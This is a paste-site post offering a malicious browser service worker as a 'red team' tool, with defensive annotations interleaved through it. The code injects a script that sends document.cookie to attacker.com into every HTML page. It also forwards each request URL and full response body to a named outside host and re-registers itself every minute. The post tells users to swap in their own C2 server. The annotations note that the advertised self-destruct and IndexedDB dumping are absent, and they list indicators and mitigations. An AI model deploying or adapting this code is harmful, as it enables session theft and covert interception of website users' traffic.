xosski

Persistent db poisoning (red team penetrating)

Mar 27th, 2025
  1. 1. Fetch Hijacking & Payload Injection
  2. • Intercepts network requests and modifies static files.
  3. • Injects a C2-controlled JavaScript payload into .html files.
  4. • Ensures real-time remote control via a C2 server (ditronics.com).
  5. 2. Data Exfiltration
  6. • Dumps IndexedDB cached files every 5 minutes.
  7. • Sends cached assets & static files to https://attacker.com/exfil. This needs to be changed to your c2 server
  8. • Uses small, periodic transmissions to avoid detection.
  9.  
  10. 3. Mission Window & Auto-Self-Destruction
  11. • Operates for 60 minutes, then automatically removes itself.
  12. • Prevents long-term persistence and external misuse.
  13. • Leaves no residual traces after the mission expires.
  14. (function(){
  15. 'use strict';
  16.  
  17. /**
  18. * Modified Service Worker for MITM & Hijacking
  19. * Injects payloads, modifies cache, and enables persistence
  *
  * NOTE(analysis): annotated sample. Only what this listing shows is described
  * below; the feature list above the code (IndexedDB dumps every 5 minutes,
  * a 60-minute mission window, self-removal) does not appear anywhere in the
  * code. There is also no cache manipulation despite the header comment — the
  * worker rewrites responses in flight and re-registers itself; nothing else.
  * Defensive takeaway: a service worker sits in front of every fetch for its
  * scope, so the observables are (1) an unexpected registration of /sw.js on
  * the origin and (2) outbound POSTs to the EXFIL_URL host carrying a JSON
  * body of the form { url, data }.
  20. */
  21.  
  // Inline <script> that is spliced before </body> of every rewritten HTML
  // response; it POSTs document.cookie to attacker.com. Mitigation: session
  // cookies marked HttpOnly are not readable through document.cookie, and a
  // CSP script-src without 'unsafe-inline' blocks this inline script because
  // the original response headers are passed through unchanged (see below).
  22. const MALICIOUS_PAYLOAD = `<script>fetch('https://attacker.com/exfil', {method: 'POST', body: document.cookie});</script>`;
  // Collection endpoint for the fetch handler below. Network IoC as given on
  // this page: POST https://ditronics.com/exfil, Content-Type: application/json.
  23. const EXFIL_URL = 'https://ditronics.com/exfil'; // Change to your controlled server
  24.  
  25. /**
  26. * Hijack & Modify Responses
  *
  * For a response whose Content-Type contains "text/html", returns a new
  * Response whose body is the original text with MALICIOUS_PAYLOAD inserted
  * before the first "</body>" (String.prototype.replace with a string pattern
  * replaces only the first match). Status, statusText and headers are copied
  * from the original, so security headers such as CSP survive the rewrite.
  * Any other content type, and any error, yields the original response.
  * @param {Response} originalResponse - upstream response from fetch()
  * @returns {Promise<Response>} rewritten HTML response or the original
  27. */
  28. async function hijackResponse(originalResponse) {
  29. try {
  30. const clonedResponse = originalResponse.clone();
  31. const contentType = clonedResponse.headers.get("Content-Type");
  32.  
  33. if (contentType && contentType.includes("text/html")) {
  34. const text = await clonedResponse.text();
  35. const modifiedText = text.replace("</body>", MALICIOUS_PAYLOAD + "</body>");
  36. return new Response(modifiedText, {
  37. status: clonedResponse.status,
  38. statusText: clonedResponse.statusText,
  39. headers: clonedResponse.headers
  40. });
  41. }
  42. } catch (err) {
  // Host artifact: this exact console.error prefix is visible in DevTools of
  // an affected client and is a cheap triage indicator.
  43. console.error("Hijack Error:", err);
  44. }
  45. return originalResponse;
  46. }
  47.  
  48. /**
  49. * Hijack Fetch Event
  *
  * Handles every GET and POST the controlled pages make. The request is
  * forwarded upstream unchanged; unless the request hostname is exactly
  * 'google.com', the request URL plus the full response body are POSTed as
  * JSON to EXFIL_URL (that fetch is fire-and-forget, neither awaited nor
  * error-handled), and the response is then passed through hijackResponse.
  * Other HTTP methods are not intercepted and fall through to the browser.
  50. */
  51. self.addEventListener('fetch', async event => {
  52. const url = new URL(event.request.url);
  53.  
  54. // Exfiltrate Data Stealthily
  55. if (event.request.method === 'POST' || event.request.method === 'GET') {
  56. event.respondWith(fetch(event.request.clone()).then(async response => {
  // Only an exact hostname match is excluded; subdomains are not.
  57. if (url.hostname !== 'google.com') {
  58. fetch(EXFIL_URL, {
  59. method: 'POST',
  60. headers: { 'Content-Type': 'application/json' },
  61. body: JSON.stringify({ url: event.request.url, data: await response.text() })
  62. });
  63. }
  64. return hijackResponse(response);
  65. }));
  66. }
  67. });
  68.  
  69. /**
  70. * Service Worker Hijacking & Persistence
  *
  * skipWaiting() activates this worker without waiting for the previous one
  * to release its clients; clients.claim() then takes control of already-open
  * pages immediately instead of on their next navigation. Together they mean
  * the worker is effective as soon as it is registered, without a reload.
  71. */
  72. self.addEventListener('install', event => {
  73. event.waitUntil(self.skipWaiting());
  74. });
  75.  
  76. self.addEventListener('activate', event => {
  77. event.waitUntil(self.clients.claim());
  78. });
  79.  
  80. /**
  81. * Persistence: Auto-Reinstall & Clone
  *
  * Re-registers /sw.js on the origin; registration failures are only logged
  * ("Persistence Error:" is the second console artifact to look for). The
  * worker can only be registered if the origin serves /sw.js, so the root
  * cause to investigate is write access to the site's root path, not the
  * worker itself. Mitigation: unregister the worker and clear site storage on
  * affected clients, and serve /sw.js with no-cache so a removed file is not
  * re-served from HTTP cache.
  82. */
  83. async function persistSW() {
  84. try {
  85. await navigator.serviceWorker.register('/sw.js');
  86. } catch (err) {
  87. console.error("Persistence Error:", err);
  88. }
  89. }
  90.  
  // Repeated registration attempts at a fixed 60 s cadence are themselves a
  // detectable pattern in request logs for /sw.js.
  91. setInterval(() => persistSW(), 60000); // Reinstall every 60s
  92. })();